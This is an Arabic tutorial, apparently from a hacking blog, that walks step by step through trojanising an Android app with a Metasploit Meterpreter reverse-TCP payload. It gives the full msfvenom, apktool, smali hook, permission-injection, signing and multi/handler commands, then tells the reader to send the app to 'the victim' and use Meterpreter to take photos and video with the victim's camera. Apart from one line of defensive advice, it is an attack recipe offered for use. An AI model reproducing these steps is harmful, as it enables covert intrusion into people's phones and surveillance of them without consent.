دمج بايلود ميتاسبلويت مع تطبيق اندرويد الشرح الكامل 2020
دمج بايلود ميتاسبلويت مع تطبيق اندرويد الشرح الكاملالسلام عليكم
مقدمه :
تعريف البايلود ( payload ) هو ملف يصنع لك باب خلفى كما يعرف عند مستخدمى نجرات و برورات بــ server
سوف نتعلم فى هذا الدرس كيفية حقن بايلود الميتاسبلويت داخل تطبيق اندرويد بالطريقه الصحيحه والصعبه ولكن مع المتابعه الواعيه سوف تجد الامر لا يستغرق 5 دقائق ان استوعبته
لحمايه نفسك من مثل هذه التطبيقات
تاكد من ان خيار ( تثبيت تطبيقات من مصادر خارجيه ) غير مفعل عندك
كما انك عبر هذا الدرس سوف تتعلم اعطاء تصاريح والغائها يمكنك الغاء ما تريد وتستخدم التطبيق ( ابدع )الادوات المستخدمة :
- apktool
- metasploit
اولا تاكد من وجود هذا الادوات عندك افتح ترمينال واكتب
apktool
msfconsole
اذا فتحت معك مثل هذا فهى عندك
فى حالة عدم وجودهم هذه روابط التحميل
apktool install
metasploit
خطوات العمل:
بما ان الدرس كبير سوف اعطيكم لمحة موجزه عن ما نحن بصدد القيام به
انشاء بايلود ميتاسبلويت
فك بايلود الميتاسبلويت وتطبيق الاندرويد
نسخ ملفات البايلود الى تطبيق الاندرويد
حقن هوك فى ملف التشغيل الرئيسى للتطبيق
حقن التصاريح فى ملف التصاريح داخل التطبيق
اعادة تجميع التطبيق الى ملف APK
تسجيل التطبيق
- الاستماع والاتصال بالضحيه
وسوف نشرح استخدام جلسة METERPRETER للاتصال بالتطبيق
قبل اى شىء قم باتشاء فولدر فوق سطح المكتب وهو ما سوف يحتوى على البايلود والتطبيق الاصلى عن طريق الامر التالى1- انشاء فولدر
mkdir Desktop/android
2- الانتقال اليه
cd Desktop/android
الخطوه الاولى:
وانت داخل فولدر ANDROID قم بتنفيز الامر التالى مع تعديله حسب بياناتك
انشاء بايلود ميتاسبلويت بامتداد APK
قبل اى شىء لابد من انشاء بايلود METERPRETER عن طريق امر MSFVENOM1- استبدل PAYLOAD_TYPE باى نوع بايلودmsfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk
هناك العديد من البايلود وكلها تعمل على الاتصال بنظامك من داخل التطبيق الاختلاف فقط فى طريقه الاتصال بك
- وهذه هى البايلودات المتاحه
- reverse_tcp
- reverse_http
- reverse_https
2- استبدل IP_ADDRESS بعنوان الاى بى الخاص بكلمعرفة عنوان الاى بى الخاص بك اكتب فى ترمينال ifconfig
3- استبدل INCOMING_PORT باى بورت تريد وليكن 4444
ولكن تذكر هذا الرقم لاننا سوف نستخدمه فى الاستماع
4- استبدل METERPRETER.APK باى اسم تريد وليكن PAYLOAD.APK
هذا هو الكود بعد تعبئة البيانات:-MSFVENOM -P ANDROID/METERPRETER/REVERSE_TCP LHOST=55.0.0.10 LPORT=4444 -O PAYLOAD.APK
وها هو ملف البايلود
قم بتحميل اى تطبيق ووضعه داخل مجلد android
الخطوه الثانيه:
فك التطبيق الاصلى والبايلود
حتى نستطيع التعديل على برمجة التطبيق علينا فك التطبيق باداة APKTOOL ليكون بلغة البشر وليس الاله
من نفس الفولدر المحتوى على التطبيق والبايلود نفذ الاوامر الاتيهفك التطبيق الاصلى
apktool d -f -o chat chat.apk
فك البايلود
apktool d -f -o payload payload.apk
بعد فك التطبيق والبايلود ينتج عنهما فولدر البايلود وفولدر التطبيق
الخطوه الثالثه:
نسخ ملفات البايلود الى التطبيق عن طريق الامر التالىcp payload/smali/com/* -R chat/smali/com
الخطوه الرابعه :
حقن هوك فى ملف التشغيل الرئيسى للتطبيق
الهوك هو ما سيقوم بتشغيل البايلود الذى قمنا بنسخه فى الخطوه السابقه فبدونه لن يحدث اى شىء وهى خطوه مهمه جدا وتحتاج الى تركيز وتشغيل مخ
افتح فولدر التطبيق ثم افتح ملف AndroidManifest.xml بواسطة محرر النصوص
ثم ابحث عن كلمة LAUNCHER
كما ترى فوق كلمة LUNCHER يوجد مسار واجهة تسجيل الدخول الرئيسيه
me.antichat.activities.loginactivity
هذا المسار موجود داخل فولدر com
com/me/antichat/activities.loginactivity
ملحوظه هذا المسار يختلف من تطبيق لاخر وعليك معرفة المسار الحقيقى للواجهة الرئيسيه لانه من الممكن ان تضع الكود فى واجهه فرعيه فلن يعمل الكود الا اذا فتح المستخدم تلك الواجهه
بعد التوجه للمسار نجد الملف باسم LoginActivity.smali نقوم بفتحه بمحرر النصوص
نبحث عن جملة
;->onCreate(Landroid/os/Bundle;)V
عند ايجاد هذه الجمله على الفور ضع هذا الكود فى السطر الذى يليها
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
ثم احفظ الملف واغلقه
الخطوه الخامسه :
حقن التصاريح فى ANDROIDMANIFEST.XML التصاريح داخل التطبيق
التصاريح هى ما يعطى لك الحق فى التحكم فى اشياء معينه على حسب التصريح فمنه يمكنك اعطاء تصريح الوصول للكميرا واستخدامها تسجيل الميك الوصول للملفات الخ الخ الخافتح ملفAndroidManifest.xml الموجود داخل التطبيق
جميع ما هو محدد تصاريح التطبيق الاصليه
نفتح ملفAndroidManifest.xml الموجود داخل فولدر البايلود
انسخ جميع التصاريح المحدده فى الصوره او اختر منها ما تريد والصقه فى ملف AndroidManifest.xml الموجود فى فولدر التطبيق اسفل التصاريح الاصليه
الخطوه السادسه :ثم احفظ الملف واغلقه
اعادة تجميع التطبيق الى ملف APK
بعد ان دمجنا ملفات البايلود وحقنا الهوك والتصاريح علينا الان جمع التطبيق المزيف الى ملف apk حتى يعمل على هواتف اندرويدادخل الامر التالى
apktool b chat
بعد جمع التطبيق من جديد تجد ملف التطبيق الملغم فى هذا المسار
chat/dist/chat.apk
الخطوه السابعه :انتظر لم ننتهى بعد تبقى اخر خطوه
تسجيل التطبيق
هى اهم خطوه والكثير يفشل بسببها
بدون تسجيل التطبيق لن يعمل وسوف تواجهك مشكلة توقف التطبيق والتسجيل هو عباره عن ملىء بيانات المؤلف للتطبيق
اذا كان لديك مفتاح ترخيص استخدمه اذا لم يكن لديك قم بانشاء مفتاح جديد عبر الاتىامر انشاء مفتاح ترخيص
keytool -genkey -v -keystore keyname.keystore -alias aliasname -keyalg RSA -keysize 2048 -validity 10000
- keyname هو اسم المفتاح عدله حسب ما تريد
- alisename هو الاسم المستعار عدله حسب ما تريد
- 10000 هو عدد الايام التى سينتهى مفعول التطبيق بعدها انصحك لا تعدلها
بعد تنفيذ الكود السابق سوف يطلب منك الاتى
enter keystore password: اكتب كلمة سر
re-enter new password: تاكيد كلمة السر
what is your first and last name: اسمك
what is the name of your organizathional unit: اسم منظمتك
what is the name of your organizathional: اسم المنظمه
what is the name of your city or locality : بلدك
what is the name of your state or province: محافظتك
what is the two-letter country code for this unit : اكتب حرفين
بعدها يسالك هل هذه البيانات صحيحه اكتب yes
RETURN if same as keystore password : اضغط انتر لنفس كلمة السر السابقه
الان انتهينا من انشاء مفتاح ترخيص جديد
الان نسجل التطبيق بهذا المفتاح
امر تسجيل التطبيق
jarsigner -verbose -keystore keyname.keystore -digestalg SHA1 -sigalg MD5withRSA chat/dist/chat.apk aliasname
- keyname.keystore : اسم المفتاح الذى صنعناه مسبقا
- chat/dist/chat.apk : مسار ملف التطبيق المزيف
- aliasname : الاسم المستعار الذى صنعناه مسبقا
سوف يطلب منك ادخال كلمة السر التى صنعناها عند انشاء المفتاح ادخلها واضغط enter
الان انتهينا من صناعة التطبيق
لا يتبقى سوى ارسال التطبيق الى الضحيه وتشغيله والخطوه التاليه الاتصال بالتطبيق والتحكم بهاتف الضحيه
ملحوظه : هذا التطبيق تم صنعه للاختراق داخل الشبكة وليس خارجها على حسب الاى بى داخلى او خارجى
الخطوه الثامنه :ملحوظه : هذا التطبيق لن يتم تثبيته الا اذا كنت مفعل خيار تثبيت تطبيقات من مصادر خارجيه
الاستماع والاتصال بالضحيه
حتى نستطيع الاتصال بالضحيه يجب تشغيل الاستماع
عن طريق اداة ميتاسبلويتقم بتشغيل اداة الميتاسبلويت عن طريق الامر التالى
msfconsole
بعد تشغيل الميتاسبلويت قم بتعبئة البيانات كالاتى
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 55.0.0.10
set LPORT 4444
exploit
استبدل LHOST و LPORT ببيانات البايلود الخاص بك
بعد تشغيل الاستماع قم بتشغيل التطبيق على هاتفك للتجربه عند نجاح الاتصال سوف يظهر لك meterpreter كالاتى
الان نجح الاتصال واصبحت داخل هاتف الضحيه
لرؤية كافة الاوامر المتاحه فى meterpreter اكتب help
وسوف تظهر لك كل الاوامر كالاتى
واليك بعض الاوامر الخاصه بالاندرويد
webcam_list معرفة عدد الكميرات المتاحه فى هاتف الضحيه
webcam_snap اخذ صوره بكاميرا الضحيه
webcam_snap 1 اخذ صوره بالكاميرا الاولى او الخلفيه
webcam_stream تشغيل الكميرا لتصوير فيديو مباشر
كما ترى عندما نفذت امر webcam_list اخبرنى انه توجد كاميرا واحده فقط
هههههههههه فعلا جهازى يحتوى على كاميرا واحده لانى اكره الاماميه فهى تصور فى صمت وبدون علمك
ثانيا نفذت امر webcam_snap فقام باخذ صوره وحفظها على جهازى
وها هى الصوره التى التقطتها عبر التطبيق المزيف
الى الان انتهى المرح ولكن دروسنا لم تنتهى بعد فمازلتهناك اساليب اخرى
تابعنا عبر صفحتنا على فيسبوك >>>>
تحياتى لكمللاساله توجه لصفحتنا على فيسبوك وابحث عن الدرس وضع مشكلتك مرفق معها سكرين شوت للمشكله
القط
